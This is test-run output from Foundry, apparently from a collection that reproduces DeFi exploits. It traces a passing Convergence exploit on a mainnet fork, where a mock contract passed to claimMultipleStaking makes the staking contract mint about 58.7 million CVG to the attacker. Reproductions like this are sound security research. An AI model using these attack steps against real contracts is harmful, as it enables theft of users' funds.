Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.17s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-08/Convergence_exp.sol:72:9:
   |
72 |         address account
   |         ^^^^^^^^^^^^^^^

Warning (2018): Function state mutability can be restricted to view
  --> src/test/2024-08/Convergence_exp.sol:71:5:
   |
71 |     function claimCvgCvxMultiple(
   |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 483.27ms (5.88ms CPU time)

Ran 1 test for src/test/2024-08/Convergence_exp.sol:ContractTest
[PASS] testExploit() (gas: 378119)
Logs:
  [End] Attacker CVG balance after exploit: 58718395.056818121904518498

Traces:
  [3649] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 20434449 [2.043e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [378119] ContractTest::testExploit()
    ├─ [268650] → new Mock@0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f
    │   ├─  storage changes:
    │   │   @ 0: 0 → 0x00000000000000000000000097effb790f2fbb701d88f89db4521348a2b77be8
    │   └─ ← [Return] 1231 bytes of code
    ├─ [2371] 0x97efFB790f2fbB701D88f89DB4521348A2B77be8::totalSupply() [staticcall]
    │   └─ ← [Return] 44258674397309562755626110 [4.425e25]
    ├─ [58194] 0x2b083beaaC310CC5E190B1d2507038CcB03E7606::claimMultipleStaking([0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1, true, 1)
    │   ├─ [50875] 0x47c69e8c909ce626Af73c955A5e34A20B7c71f19::claimMultipleStaking([0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1, true, 1) [delegatecall]
    │   │   ├─ [2223] Mock::claimCvgCvxMultiple(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─ [371] 0x97efFB790f2fbB701D88f89DB4521348A2B77be8::totalSupply() [staticcall]
    │   │   │   │   └─ ← [Return] 44258674397309562755626110 [4.425e25]
    │   │   │   └─ ← [Return] 115792089237316195423570985008687907853269984665640519780783186698350374013825 [1.157e77], []
    │   │   ├─ [45714] 0x97efFB790f2fbB701D88f89DB4521348A2B77be8::mintStaking(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 115792089237316195423570985008687907853269984665640519780783186698350374013825 [1.157e77])
    │   │   │   ├─ [9956] 0xB0Afc8363b8F36E0ccE5D54251e20720FfaeaeE7::isStakingContract(0x2b083beaaC310CC5E190B1d2507038CcB03E7606) [staticcall]
    │   │   │   │   ├─ [2658] 0xbdbdDc4bF67e9Bc02706e4Ce53BC14d6cE3038f1::isStakingContract(0x2b083beaaC310CC5E190B1d2507038CcB03E7606) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 58718395056818121904518498 [5.871e25])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x00000000000000000000000000000000000000000030921a930391c80af87562
    │   │   │   │   @ 2: 0x000000000000000000000000000000000000000000249c238bf0e631f872347e → 0x000000000000000000000000000000000000000000552e3e1ef477fa036aa9e0
    │   │   │   │   @ 6: 0x000000000000000000000000000000000000000000010f63f17475e9b1078a9e → 0x00000000000000000000000000000000000000000031a17e847807b1bc000000
    │   │   │   └─ ← [Stop]
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [618] 0x97efFB790f2fbB701D88f89DB4521348A2B77be8::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 58718395056818121904518498 [5.871e25]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker CVG balance after exploit", val: 58718395056818121904518498 [5.871e25], decimals: 18)
    ├─  storage changes:
    │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x00000000000000000000000000000000000000000030921a930391c80af87562
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.77s (3.25s CPU time)

Ran 2 test suites in 5.57s (5.25s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
